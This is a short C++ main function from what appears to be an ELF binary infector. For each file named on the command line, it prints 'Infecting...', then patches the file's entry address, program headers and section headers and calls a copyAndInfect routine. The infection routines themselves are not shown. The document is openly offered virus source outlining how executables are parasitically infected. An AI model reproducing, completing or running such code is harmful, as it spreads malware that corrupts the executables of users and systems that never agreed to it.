int main(int argc, char** argv)
{
  char** pp = argv;
  const char* p;
  while(0 != (p = *++pp))
  {
    fprintf(stderr, "Infecting %s... ", p);
    Target target(p);
    if (target.isOpen()
	&& target.isSuitable()
	&& target.patchEntryAddr()
	&& target.patchPhdr()
	&& target.patchShdr()
	&& target.copyAndInfect()
    )
      fprintf(stderr, "Ok\n");
  }
  return 0;
}
